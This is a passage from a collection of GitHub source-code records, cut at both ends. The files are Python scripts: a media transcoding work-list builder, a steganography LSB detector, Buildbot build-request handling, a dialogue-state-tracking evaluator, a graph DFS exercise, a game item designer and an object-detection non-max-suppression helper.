break\n","repo_name":"sarthakpriyadarshi/repository_python","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28038266810","text":"\"\"\" Makes a work list given contents of an extracted tarball/zip \"\"\"\n\nimport os\nimport argparse\nimport json\nimport subprocess\nimport hashlib\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"directory\")\n args = parser.parse_args()\n\n # This actually gets images + videos\n videos = []\n images = []\n state_files = []\n localization_files = []\n\n for root, dirs, files in os.walk(args.directory):\n for fp in files:\n path = os.path.join(root,fp)\n cmd = [\n \"ffprobe\",\n \"-v\",\"error\",\n \"-show_entries\", \"stream\",\n \"-print_format\", \"json\",\n \"-select_streams\", \"v\",\n path,\n ]\n try:\n output = subprocess.run(cmd,\n stdout=subprocess.PIPE,\n check=True).stdout\n video_info = json.loads(output)\n print(video_info)\n for idx, stream in enumerate(video_info[\"streams\"]):\n if stream[\"codec_type\"] == \"video\":\n codec_name = stream[\"codec_name\"]\n print(f\"codec_name = {codec_name}\")\n # TODO: Determine a better way to know image vs. video?\n if codec_name == \"png\" or codec_name == \"mjpeg\":\n images.append(path)\n print(f\"Adding image {path}\")\n break\n else:\n print(f\"Adding video {path}\")\n videos.append(path)\n break\n except:\n pass\n\n md5_lookup={}\n\n def make_workflow_video(video):\n # Calculate md5\n md5 = md5_lookup[video]\n\n base = os.path.splitext(video)[0]\n # This is the arguments for each iteration of the transcode DAG\n paths = {\n 'dirname': os.path.dirname(video),\n 'base': os.path.basename(base),\n 'entity_type': '-1', # Have server auto compute this\n 'name': os.path.basename(video),\n 'md5': md5\n }\n return paths\n\n def make_workflow_image(image):\n # Calculate md5\n md5 = md5_lookup[image]\n\n base = os.path.splitext(image)[0]\n # This is the arguments for each iteration of the transcode DAG\n paths = {\n 'url': 'None',\n 'original': image,\n 'entity_type': '-1', # Have server auto compute this\n 'name': os.path.basename(image),\n 'md5': md5\n }\n return paths\n\n def states_for_media(media):\n base = os.path.splitext(media)[0]\n l = []\n for root, dirs, files in os.walk(os.path.join(args.directory,\n base,\n \"states\")):\n for fp in files:\n if os.path.splitext(fp)[-1].lower() == \".csv\":\n state_files.append({\"md5\": md5_lookup[media],\n \"file\": os.path.join(root,fp)})\n return l\n\n def localizations_for_media(media):\n base = os.path.splitext(media)[0]\n l=[]\n for root, dirs, files in os.walk(os.path.join(args.directory,\n base,\n \"localizations\")):\n for fp in files:\n if os.path.splitext(fp)[-1].lower() == \".csv\":\n l.append({\"md5\": md5_lookup[media],\n \"file\": os.path.join(root,fp)})\n return l\n\n\n # Pre-calculate hash of videos + images\n for media in [*videos, *images]:\n with open(media,'rb') as fp:\n data = fp.read()\n md5_lookup[media] = hashlib.md5(data).hexdigest()\n state_files.extend(states_for_media(media))\n localization_files.extend(localizations_for_media(media))\n\n # Remove media that is corrupt prior to trying to transcode\n def is_valid(media):\n # Check to make sure the image/video is not corrupt\n cmd = [\n \"ffprobe\",\n \"-v\",\"error\",\n \"-show_entries\", \"stream\",\n \"-print_format\", \"json\",\n \"-select_streams\", \"v\",\n \"{}\".format(media),\n ]\n status = subprocess.run(cmd).returncode\n if status != 0:\n print(f\"Removing {media} from worklist due to video corruption\")\n return False\n else:\n print(f\"Adding {media} to worklist\")\n return True\n\n print(f\"Putting jsons into {args.directory}\")\n def split_list_into_k8s_chunks(data, name):\n MAX_NUM_WORK_FILES=20\n MAX_FILE_SIZE=220000\n work_packets=['' for x in range(MAX_NUM_WORK_FILES)]\n temp_list=[]\n work_packet=0\n\n # Initialize empty files just incase\n for x in range(MAX_NUM_WORK_FILES):\n print(f'Attempting to save {os.path.join(args.directory, f\"{name}_{work_packet}.json\")}')\n with open(os.path.join(args.directory, f\"{name}_{x}.json\"), 'w') as packet_file:\n json.dump(temp_list, packet_file)\n\n # Iterate through each data and figure out how to break it up into ~220Kb chunks\n for x in data:\n temp_list.append(x)\n json_str = json.dumps(temp_list)\n if len(json_str) > MAX_FILE_SIZE:\n temp_list.pop()\n with open(os.path.join(args.directory, f\"{name}_{work_packet}.json\"), 'w') as packet_file:\n print(f\"temp_list = {temp_list}\")\n json.dump(temp_list, packet_file)\n temp_list = [x]\n work_packet += 1\n if len(temp_list) > 0:\n print(f\"temp_list = {temp_list}\")\n with open(os.path.join(args.directory, f\"{name}_{work_packet}.json\"), 'w') as packet_file:\n json.dump(temp_list, packet_file)\n\n # Initialize all the work files first\n work=[make_workflow_video(vid) for vid in videos if is_valid(vid)]\n split_list_into_k8s_chunks(work,\"videos\")\n\n # don't split images into work packets\n work=[make_workflow_video(img) for img in images if is_valid(img)]\n with open(os.path.join(args.directory, f\"images.json\"), 'w') as packet_file:\n json.dump(work, packet_file)\n\n split_list_into_k8s_chunks(localization_files,\"localizations\")\n\n split_list_into_k8s_chunks(state_files, \"states\")\n","repo_name":"cvisionai/tator","sub_path":"scripts/transcoder/makeWorkList.py","file_name":"makeWorkList.py","file_ext":"py","file_size_in_byte":6662,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"52"} +{"seq_id":"26894852714","text":"import sys\r\n\r\nimport imageio as iio\r\nimport matplotlib.pyplot as plt\r\n\r\nimport utils\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) > 1:\r\n target = sys.argv[1]\r\n else:\r\n target = 'sampleImages/hide_image.png'\r\n img = iio.imread(target)\r\n utils.magnify_LSB(img).show()\r\n utils.get_LSB_histogram(img)\r\n plt.show()\r\n\r\ndef grab_hist(target, savename):\r\n img = iio.imread(target)\r\n hist = utils.get_LSB_histogram(img)\r\n\r\n utils.save(hist, savename)\r\n\r\ndef grab_magnified(target, savename):\r\n img = iio.imread(target)\r\n magnified = utils.magnify_LSB(img)\r\n\r\n utils.save(magnified, savename)\r\n","repo_name":"cjense/COSC-383","sub_path":"P4/detect_steg.py","file_name":"detect_steg.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13056007746","text":"import calendar\n\nfrom buildbot import interfaces\nfrom buildbot import sourcestamp\nfrom buildbot.db import buildrequests\nfrom buildbot.process import properties\nfrom buildbot.status.results import FAILURE\nfrom twisted.internet import defer\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass BuildRequest(object):\n\n \"\"\"\n\n A rolled-up encapsulation of all of the data relevant to a build request.\n\n This class is used by the C{nextBuild} and C{mergeRequests} configuration\n parameters, as well as in starting a build. Construction of a BuildRequest\n object is a heavyweight process involving a lot of database queries, so\n it should be avoided where possible. See bug #1894.\n\n Build requests have a SourceStamp which specifies what sources to build.\n This may specify a specific revision of the source tree (so source.branch,\n source.revision, and source.patch are used). The .patch attribute is either\n None or a tuple of (patchlevel, diff), consisting of a number to use in\n 'patch -pN', and a unified-format context diff.\n\n Alternatively, the SourceStamp may specify a set of Changes to be built,\n contained in source.changes. In this case, the requeset may be mergeable\n with other BuildRequests on the same branch.\n\n @type source: L{buildbot.sourcestamp.SourceStamp}\n @ivar source: the source stamp that this BuildRequest use\n\n @type reason: string\n @ivar reason: the reason this Build is being requested. Schedulers provide\n this, but for forced builds the user requesting the build will provide a\n string. It comes from the buildsets table.\n\n @type properties: L{properties.Properties}\n @ivar properties: properties that should be applied to this build, taken\n from the buildset containing this build request\n\n @ivar submittedAt: a timestamp (seconds since epoch) when this request was\n submitted to the Builder. This is used by the CVS step to compute a\n checkout timestamp, as well as by the master to prioritize build requests\n from oldest to newest.\n\n @ivar buildername: name of the requested builder\n\n @ivar priority: request priority\n\n @ivar id: build request ID\n\n @ivar bsid: ID of the parent buildset\n \"\"\"\n\n source = None\n sources = None\n submittedAt = None\n\n @classmethod\n def fromBrdict(cls, master, brdict):\n \"\"\"\n Construct a new L{BuildRequest} from a dictionary as returned by\n L{BuildRequestsConnectorComponent.getBuildRequest}.\n\n This method uses a cache, which may result in return of stale objects;\n for the most up-to-date information, use the database connector\n methods.\n\n @param master: current build master\n @param brdict: build request dictionary\n\n @returns: L{BuildRequest}, via Deferred\n \"\"\"\n cache = master.caches.get_cache(\"BuildRequests\", cls._make_br)\n return cache.get(brdict['brid'], brdict=brdict, master=master)\n\n @classmethod\n @defer.inlineCallbacks\n def _make_br(cls, brid, brdict, master):\n buildrequest = cls()\n buildrequest.id = brid\n buildrequest.bsid = brdict['buildsetid']\n buildrequest.buildername = brdict['buildername']\n buildrequest.priority = brdict['priority']\n dt = brdict['submitted_at']\n buildrequest.submittedAt = dt and calendar.timegm(dt.utctimetuple())\n buildrequest.master = master\n\n # fetch the buildset to get the reason\n buildset = yield master.db.buildsets.getBuildset(brdict['buildsetid'])\n assert buildset # schema should guarantee this\n buildrequest.reason = buildset['reason']\n\n # fetch the buildset properties, and convert to Properties\n buildset_properties = yield master.db.buildsets.getBuildsetProperties(brdict['buildsetid'])\n\n buildrequest.properties = properties.Properties.fromDict(buildset_properties)\n\n # fetch the sourcestamp dictionary\n sslist = yield master.db.sourcestamps.getSourceStamps(buildset['sourcestampsetid'])\n assert len(sslist) > 0, \"Empty sourcestampset: db schema enforces set to exist but cannot enforce a non empty set\"\n\n # and turn it into a SourceStamps\n buildrequest.sources = {}\n\n def store_source(source):\n buildrequest.sources[source.codebase] = source\n\n dlist = []\n for ssdict in sslist:\n d = sourcestamp.SourceStamp.fromSsdict(master, ssdict)\n d.addCallback(store_source)\n dlist.append(d)\n\n yield defer.gatherResults(dlist)\n\n if buildrequest.sources:\n buildrequest.source = buildrequest.sources.values()[0]\n\n defer.returnValue(buildrequest)\n\n def requestsHaveSameCodebases(self, other):\n self_codebases = set(self.sources.iterkeys())\n other_codebases = set(other.sources.iterkeys())\n return self_codebases == other_codebases\n\n def requestsHaveChangesForSameCodebases(self, other):\n # Merge can only be done if both requests have sourcestampsets containing\n # comparable sourcestamps, that means sourcestamps with the same codebase.\n # This means that both requests must have exact the same set of codebases\n # If not then merge cannot be performed.\n # The second requirement is that both request have the changes in the\n # same codebases.\n #\n # Normaly a scheduler always delivers the same set of codebases:\n # sourcestamps with and without changes\n # For the case a scheduler is not configured with a set of codebases\n # it delivers only a set with sourcestamps that have changes.\n self_codebases = set(self.sources.iterkeys())\n other_codebases = set(other.sources.iterkeys())\n if self_codebases != other_codebases:\n return False\n\n for c in self_codebases:\n # Check either both or neither have changes\n if ((len(self.sources[c].changes) > 0)\n != (len(other.sources[c].changes) > 0)):\n return False\n # all codebases tested, no differences found\n return True\n\n def canBeMergedWith(self, other):\n \"\"\"\n Returns if both requests can be merged\n \"\"\"\n\n if not self.requestsHaveChangesForSameCodebases(other):\n return False\n\n # get codebases from myself, they are equal to other\n self_codebases = set(self.sources.iterkeys())\n\n for c in self_codebases:\n # check to prevent exception\n if c not in other.sources:\n return False\n if not self.sources[c].canBeMergedWith(other.sources[c]):\n return False\n return True\n\n def mergeSourceStampsWith(self, others):\n \"\"\" Returns one merged sourcestamp for every codebase \"\"\"\n # get all codebases from all requests\n all_codebases = set(self.sources.iterkeys())\n for other in others:\n all_codebases |= set(other.sources.iterkeys())\n\n all_merged_sources = {}\n # walk along the codebases\n for codebase in all_codebases:\n all_sources = []\n if codebase in self.sources:\n all_sources.append(self.sources[codebase])\n for other in others:\n if codebase in other.sources:\n all_sources.append(other.sources[codebase])\n assert len(all_sources) > 0, \"each codebase should have atleast one sourcestamp\"\n all_merged_sources[codebase] = all_sources[0].mergeWith(all_sources[1:])\n\n return [source for source in all_merged_sources.itervalues()]\n\n def mergeReasons(self, others):\n \"\"\"Return a reason for the merged build request.\"\"\"\n reasons = []\n for req in [self] + others:\n if req.reason and req.reason not in reasons:\n reasons.append(req.reason)\n return \", \".join(reasons)\n\n def getSubmitTime(self):\n return self.submittedAt\n\n @defer.inlineCallbacks\n def cancelBuildRequest(self):\n # first, try to claim the request; if this fails, then it's too late to\n # cancel the build anyway\n try:\n yield self.master.db.buildrequests.claimBuildRequests([self.id])\n except buildrequests.AlreadyClaimedError:\n log.msg(\"build request already claimed; cannot cancel\")\n return\n\n # then complete it with 'FAILURE'; this is the closest we can get to\n # cancelling a request without running into trouble with dangling\n # references.\n yield self.master.db.buildrequests.completeBuildRequests([self.id],\n FAILURE)\n\n # and let the master know that the enclosing buildset may be complete\n yield self.master.maybeBuildsetComplete(self.bsid)\n\n\nclass BuildRequestControl:\n implements(interfaces.IBuildRequestControl)\n\n def __init__(self, builder, request):\n self.original_builder = builder\n self.original_request = request\n self.brid = request.id\n\n def subscribe(self, observer):\n raise NotImplementedError\n\n def unsubscribe(self, observer):\n raise NotImplementedError\n\n def cancel(self):\n d = self.original_request.cancelBuildRequest()\n d.addErrback(log.err, 'while cancelling build request')\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/process/buildrequest.py","file_name":"buildrequest.py","file_ext":"py","file_size_in_byte":9383,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"7034168278","text":"\"\"\" evaluate.py: evaluates the model \"\"\"\n\nimport argparse\nimport logging\nimport os\n\nimport numpy as np\nimport torch\nimport utils\n\nfrom model.DSTModel import DST\nfrom model.DSTModel import get_slot_predictions\nfrom model.data_loader import DialoguesDataset\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom tqdm import trange\nimport torch.nn.functional as F\nimport torch.nn as nn\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--data_dir', default='./data')\nparser.add_argument('--data_filename')\nparser.add_argument('--model_dir', default='./experiments')\nparser.add_argument('--model_checkpoint_name', default='best.pth.tar')\n\ndef get_filled_slot_dict(candidates, slot_predictions):\n \"\"\" get_filled_slot_dict: returns a dictionary representing slot predictions by the model\n @ param candidates (List[String]): list of candidates (strings)\n @ param slot_prediction (List[Tensor]): List of tensors with output predictions for each slot for\n each cand\n @ returns slots_to_predval (Dict): dictionary mapping each slot to a candidate (according to\n predictions)\n \"\"\"\n slots_to_predval = {}\n for cand, slot_prediction in zip(candidates, slot_predictions):\n pos_class_index = [idx for idx, val in enumerate(slot_prediction) if val == 1]\n for index in pos_class_index:\n slots_to_predval[index] = cand\n return slots_to_predval\n\n\ndef calc_slot_accuracy(predicted_slot_dict, gt_slot_dict, num_of_slots):\n \"\"\" calc_slot_accuracy: based on predictions of the model and gt slot values, the method\n calculates a number of accuracy metrics.\n\n example calculation:\n\n num_of_slots = 35\n\n gt_slot_dict = {\n 0 : \"indian\",\n 3 : \"cheap\"\n 7 : \"far\"\n }\n\n predicted_slots = {\n 0 : \"indian\",\n 3 : \"expensive\"\n 2 : \"6:50\"\n }\n\n fp = 2, tp = 1, fn = 1\n\n slot_accuracy = (num_of_slots - 2) / num_of_slots = 33/35\n slot_precision = (tp) / (tp + fp) = 1/3\n slot_recall = tp / (tp + fn)\n join_goal_acc = 1 if tp == len(gt_slot_dict) and fp == 0 else 0\n \"\"\"\n tp, fp, fn = 0, 0, 0\n total_gt_slots = len(gt_slot_dict)\n\n for slot_id, pred in predicted_slot_dict.items():\n if slot_id in gt_slot_dict.keys():\n if pred == gt_slot_dict[slot_id]:\n tp += 1\n else:\n fp += 1\n else:\n fp += 1\n\n for slot_id, _ in gt_slot_dict.items():\n if slot_id not in predicted_slot_dict.keys():\n fn += 1\n\n # of the total slots = 35, how many were correctly predicted\n slot_accuracy = (num_of_slots - fp - fn)/num_of_slots\n slot_precision = tp / (tp + fp) if (tp + fp) != 0 else 0\n slot_recall = tp / (tp + fn) if ((tp + fn)) != 0 else 0\n slot_f1 = 2 * (slot_precision * slot_recall) / (slot_precision + slot_recall) if (slot_precision + slot_recall) != 0 else 0\n # joing goal accuracy: measures whether all slots are predicted correctly\n joint_goal_acc = 1 if (gt_slot_dict == predicted_slot_dict) else 0\n\n return slot_accuracy, joint_goal_acc, slot_precision, slot_recall, slot_f1\n\n\ndef evaluate(model, evaluation_data, model_dir, dataset_params, device):\n \"\"\" Evaluates the model over the evaluation data \"\"\"\n\n #batch_size = dataset_params['eval_batch_size']\n batch_size=1\n num_of_slots = dataset_params['num_of_slots']\n\n # set model in evaluation model\n model.eval()\n\n # set up validation_generator --> data iterator wich generates batches for the entire dataset\n validation_generator = evaluation_data.data_iterator(batch_size=batch_size, shuffle=False, is_train=False)\n\n total_loss_eval = 0\n joint_goal_acc_sum = 0\n avg_goal_acc_sum = 0\n slot_precision_sum = 0\n slot_recall_sum = 0\n slot_f1_sum = 0\n\n num_of_steps = evaluation_data.__len__() // batch_size\n\n # no loss weightage in eval step\n pos_weights = torch.tensor([1.0] * num_of_slots, device=device)\n loss_func = nn.BCEWithLogitsLoss(pos_weight=pos_weights, reduction='none')\n # summary for current eval loop\n summ = []\n\n t = trange(num_of_steps)\n\n for i in t:\n try:\n # here each data point is a turn\n turn, turn_label = next(validation_generator)\n candidates = turn['candidates']\n\n context_vector = model.get_turncontext(turn)\n context_vector_formatted = torch.cat(len(candidates)*[context_vector]).unsqueeze(dim=1)\n output = model.feed_forward(context_vector_formatted, candidates)\n output = output.squeeze(dim=1)\n\n # 1) Compute loss\n # need to weightage in evaluation\n loss = loss_func(output, turn_label)\n # 2) Compute summary statistics\n\n # get the gt slot values\n gt_slot_values_dict = turn['slots_filled']\n\n # get the output generated slot values\n slot_predictions = get_slot_predictions(output)\n predicted_slot_dict = get_filled_slot_dict(candidates, slot_predictions)\n slot_accuracy, joint_goal_acc, slot_precision, slot_recall, slot_f1 = calc_slot_accuracy(predicted_slot_dict, gt_slot_values_dict, num_of_slots)\n\n joint_goal_acc_sum += joint_goal_acc\n avg_goal_acc_sum += slot_accuracy\n slot_precision_sum += slot_precision\n slot_recall_sum += slot_recall\n slot_f1_sum += slot_f1\n\n batch_loss = loss.sum().item()\n\n summary_batch = {\n 'batch_loss' : batch_loss,\n 'slot_goal_accuracy' : slot_accuracy,\n 'joint_goal_accuracy' : joint_goal_acc,\n 'slot_precision' : slot_precision,\n 'slot_recall' : slot_recall,\n 'slot_f1' : slot_f1\n }\n summ.append(summary_batch)\n\n\n # add to total loss\n total_loss_eval += batch_loss\n\n # no more batches left\n except StopIteration:\n break\n\n avg_turn_loss = total_loss_eval/(num_of_steps)\n joint_goal_acc = joint_goal_acc_sum/(num_of_steps)\n avg_goal_acc = avg_goal_acc_sum/(num_of_steps)\n avg_slot_precision = slot_precision_sum/(num_of_steps)\n\n\n metrics_mean = {metric:np.mean([x[metric] for x in summ if x[metric] is not None]) for metric in summ[0]}\n metrics_string = \" ; \".join(\"{}: {:05.3f}\".format(k, v) for k, v in metrics_mean.items())\n logging.info(\"- Eval metrics : \" + metrics_string)\n logging.info(\"Average Evaluation Loss: {}\".format(avg_turn_loss))\n logging.info(\"Total eval loss: {}\".format(total_loss_eval))\n logging.info(\"Joint goal accuracy: {}\".format(joint_goal_acc))\n logging.info(\"Average goal accuracy: {}\".format(avg_goal_acc))\n logging.info(\"Average slot precision: {}\".format(avg_slot_precision))\n\n return metrics_mean, total_loss_eval, avg_goal_acc, joint_goal_acc, avg_slot_precision\n\nif __name__ == '__main__':\n\n args = parser.parse_args()\n\n # device\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n # load in evaluation data\n data_path = os.path.join(args.data_dir, args.data_filename)\n print(data_path)\n assert os.path.isfile(data_path)\n evaluation_data = DialoguesDataset(data_path, device=device)\n\n # model param file\n param_path = os.path.join(args.model_dir, 'params.json')\n print(param_path)\n assert os.path.isfile(param_path)\n params = utils.read_json_file(param_path)\n\n model_params = {\n 'embed_dim' : 300,\n 'sentence_hidden_dim' : params['sentence_hidden_dim'],\n 'hierarchial_hidden_dim' : params['hierarchial_hidden_dim'],\n 'da_hidden_dim' : params[ 'da_hidden_dim'],\n 'da_embed_size' : 50,\n 'ff_hidden_dim' : params['ff_hidden_dim'],\n 'ff_dropout_prob' : params[ 'ff_dropout_prob'],\n 'batch_size' : params['batch_size'],\n 'num_slots' : 35,\n 'ngrams' : ['3'],\n 'candidate_utterance_vocab_pth' : 'mst_attraction_vocab.json',\n 'da_vocab_pth': 'mst_attraction_davocab.json',\n 'device' : device\n }\n\n training_params = {\n 'num_epochs' : 10,\n 'learning_rate' : params['learning_rate'],\n 'pos_weighting' : 20.0\n }\n\n dataset_params = {\n 'train_batch_size': params['batch_size'],\n 'eval_batch_size' : 1,\n 'shuffle': True,\n 'num_workers': 1,\n 'num_of_slots' : 35\n\n }\n # model\n if torch.cuda.is_available():\n model = DST(**model_params).cuda()\n else:\n model = DST(**model_params)\n\n utils.set_logger(os.path.join(args.model_dir, 'eval.log'))\n\n logging.info('Starting evalutation')\n\n utils.load_checkpoint(os.path.join(args.model_dir, args.model_checkpoint_name), model)\n\n eval_metrics, total_loss_eval, eval_avg_goal_acc, eval_joint_goal_acc, avg_slot_precision = evaluate(model, evaluation_data, args.model_dir, dataset_params, device)\n\n save_path = os.path.join(args.model_dir, \"metrics_test.json\")\n utils.save_to_json(eval_metrics, save_path)\n\n\n\n\n","repo_name":"ANarayan/DAMSL-CS224N-FinalProject","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10105376341","text":"import sys \r\n\r\n# 최대 재귀 횟수(1000회) 제한을 풀어주기, 안하면 오류 발생\r\nsys.setrecursionlimit(10000)\r\n\r\nn, m = map(int, sys.stdin.readline().split())\r\n\r\ngraph = [[] for _ in range(n+1)]\r\ngraph[0] = [0,0]\r\nvisited = [False for _ in range(n+1)]\r\n\r\ncount = 0\r\n\r\nfor _ in range(m):\r\n start, end = map(int, sys.stdin.readline().split())\r\n \r\n graph[start].append(end)\r\n graph[end].append(start)\r\n # sort\r\n graph[start].sort()\r\n graph[end].sort()\r\n\r\ndef DFS(graph, start, visited):\r\n visited[start] = True\r\n\r\n for i in graph[start]:\r\n if not visited[i]:\r\n DFS(graph, i, visited)\r\n\r\nfor i in range(1, len(visited)):\r\n if visited[i] == False:\r\n count += 1\r\n DFS(graph, i, visited)\r\n\r\nprint(count)\r\n\r\n## 참고: https://kyoung-jnn.tistory.com/entry/%EB%B0%B1%EC%A4%8011724%EB%B2%88%ED%8C%8C%EC%9D%B4%EC%8D%ACPython-%EC%97%B0%EA%B2%B0-%EC%9A%94%EC%86%8C%EC%9D%98-%EA%B0%9C%EC%88%98-DFS","repo_name":"chanmeee/algorithm","sub_path":"백준/Silver/11724.연결 요소의 개수/연결 요소의 개수.py","file_name":"연결 요소의 개수.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29468528866","text":"import os\nfrom definitions import clear\nfrom definitions import davacis \nfrom definitions import filePath\nfrom loggingConfig import initLogger\ninitLogger(filePath)\ndef openItemDesigner(filePath):\n weapon = {}\n itemPath = f\"{filePath}/items\"\n itemName = str(input(\"What do you want to call the item?\\n>\"))\n weapon.update(damage = chooseWeaponDamage(chooseItemType()))\n weapon.update(rarity = chooseItemRarity())\n weapon.update(statReqs = chooseStatReqs(davacis))\n weapon.update(value = chooseWeaponValue())\n weapon.update(allowTraits = chooseTraitAllow()) \n weapon.update(isUnique = chooseWeaponUnique())\n print(weapon)\ndef chooseItemType():\n types = [\"weapons\",\"armour\",\"misc\"]\n try:\n type = types[int(input(\"\"\"\n What type of item do you want to make?\n 1. Weapon\n 2. Armour\n 3. Misc\\n>\"\"\")) - 1]\n except(TypeError,IndexError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseItemType()\n return\n return type\ndef chooseWeaponTypes():\n Finished = False\n while not Finished:\n try:\n weaponType = int(input(\"\"\"\n What damage types should the weapon do?\n 1. Crush\n 2. Slash\n 3. Pierce\n 4. Magic\n 5. Projectile\n 6. Etherial\n 7. Go Back\n \"\"\"))\n if weaponType > 7 or weaponType < 1:\n raise IndexError\n except(TypeError,IndexError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseWeaponTypes()\n return\n if weaponType == \"7\":\n Finished = True\n break\n finish = str(input(\"Do you want to add more damage types?\\n1. Yes\\n 2. No\\n>\"))\n if finish == \"2\":\n Finished = True \n break\n else:\n pass\ndef chooseWeaponDamage(weaponType):\n types = [\"crush\",\"slash\",\"pierce\",\"magic\",\"projectile\",\"etherial\"]\n Valid = False\n while not Valid:\n try:\n weaponDamageVals = [int(input(f\"What is the least {types[weaponType].capitalize()} damage should the weapon do?\\n>\")), int(input(f\"What is the most {types[weaponType].capitalize()} damage should the weapon do?\\n>\"))]\n Valid = True\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseWeaponDamage(weaponType)\n return\n weaponDamageDict = {} \n for i in range(len(weaponType)):\n weaponDamageDict[types[weaponType]] = weaponDamageVals\n return weaponDamageDict\ndef chooseItemRarity():\n raritys = [\"common\",\"uncommon\",\"rare\",\"epic\",\"legendary\",\"mythical\",\"unobtainable\"]\n try:\n itemRarity = raritys[int(input(\"\"\"Choose a rarity:\n 1. Common\n 2. Uncommon\n 3. Rare\n 4. Epic\n 5. Legendary\n 6. Mythical\n 7. Unobtainable\n >\"\"\")) - 1]\n return itemRarity \n except(TypeError,IndexError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseItemRarity()\n\ndef chooseStatReqs(davacis):\n statCat = [];statCatDict = {};statsReq = set()\n try:\n statsReq.add(int(input(\"\"\"\n What stat categories are needed? (input multiple numbers if needed)?\n 1. Dexterity\n 2. Agility\n 3. Vitality\n 4. Awareness\n 5. Charisma\n 6. Intelligence\n 7. Strength\"\"\")))\n for i in range(len(statsReq)):statCat.append(davacis[statsReq])\n except(TypeError,IndexError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseStatReqs(davacis)\n return\n for i in range(len(statCat)):\n try:\n statCatNum = int(input(f\"How high should the player's {statCat[i]} be?\")) \n statCatDict[statCat[i]] = statCatNum\n\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseStatReqs(davacis)\n return\n return statCatDict\ndef chooseWeaponValue():\n try:\n weaponValue = int(input(\"What should the item be worth?\\n>\"))\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseWeaponValue()\n return\n return weaponValue\ndef chooseTraitAllow():\n try:\n allowTraits = int(input(\"Should the weapon be allowed to have traits?\\n1. Yes\\n2. No\"))\n allowTraits = bool(allowTraits)\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseTraitAllow()\n return\n return allowTraits\ndef chooseWeaponUnique():\n try:\n isUnique = int(input(\"Is the weapon unique (excluded from standardloot)?\\n1. Yes\\n2. No\"))\n isUnique = bool(isUnique)\n except(TypeError):\n print(\"Invalid Input\")\n clear(\"d\")\n chooseWeaponUnique()\n return\n","repo_name":"Oriarm1234/Davacis","sub_path":"itemMaker.py","file_name":"itemMaker.py","file_ext":"py","file_size_in_byte":4820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28336953558","text":"\"\"\"Visualize bounding boxes\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport numpy as np\nimport skimage\nimport matplotlib.pyplot as plt\nimport os\nimport layer_utils\nimport label_utils\nimport math\n\nfrom skimage.io import imread\nfrom matplotlib.patches import Rectangle\nfrom matplotlib.lines import Line2D\nfrom layer_utils import anchor_boxes, minmax2centroid, centroid2minmax\nfrom label_utils import index2class, get_box_color\n\n\ndef nms(args, classes, offsets, anchors):\n \"\"\"Perform NMS (Algorithm 11.12.1).\n\n Arguments:\n args : User-defined configurations\n classes (tensor): Predicted classes\n offsets (tensor): Predicted offsets\n \n Returns:\n objects (tensor): class predictions per anchor\n indexes (tensor): indexes of detected objects\n filtered by NMS\n scores (tensor): array of detected objects scores\n filtered by NMS\n \"\"\"\n\n # get all non-zero (non-background) objects\n objects = np.argmax(classes, axis=1)\n # non-zero indexes are not background\n nonbg = np.nonzero(objects)[0]\n\n # D and S indexes in Line 1\n indexes = []\n while True:\n # list of zero probability values\n scores = np.zeros((classes.shape[0],))\n # set probability values of non-background\n scores[nonbg] = np.amax(classes[nonbg], axis=1)\n\n # max probability given the list\n # Lines 3 and 4\n score_idx = np.argmax(scores, axis=0)\n score_max = scores[score_idx]\n \n # get all non max probability & set it as new nonbg\n # Line 5\n nonbg = nonbg[nonbg != score_idx]\n\n # if max obj probability is less than threshold (def 0.8)\n if score_max < args.class_threshold:\n # we are done\n break\n\n # Line 5\n indexes.append(score_idx)\n score_anc = anchors[score_idx]\n score_off = offsets[score_idx][0:4]\n score_box = score_anc + score_off\n score_box = np.expand_dims(score_box, axis=0)\n nonbg_copy = np.copy(nonbg)\n\n # get all overlapping predictions (Line 6)\n # perform Non-Max Suppression (NMS)\n for idx in nonbg_copy:\n anchor = anchors[idx]\n offset = offsets[idx][0:4]\n box = anchor + offset\n box = np.expand_dims(box, axis=0)\n iou = layer_utils.iou(box, score_box)[0][0]\n # if soft NMS is chosen (Line 7)\n if args.soft_nms:\n # adjust score: Line 8\n iou = -2 * iou * iou\n classes[idx] *= math.exp(iou)\n # else NMS (Line 9), (iou threshold def 0.2)\n elif iou >= args.iou_threshold:\n # remove overlapping predictions with iou>threshold\n # Line 10\n nonbg = nonbg[nonbg != idx]\n\n # Line 2, nothing else to process\n if nonbg.size == 0:\n break\n\n\n # get the array of object scores\n scores = np.zeros((classes.shape[0],))\n scores[indexes] = np.amax(classes[indexes], axis=1)\n\n return objects, indexes, scores\n\n\ndef show_boxes(args,\n image,\n classes,\n offsets,\n 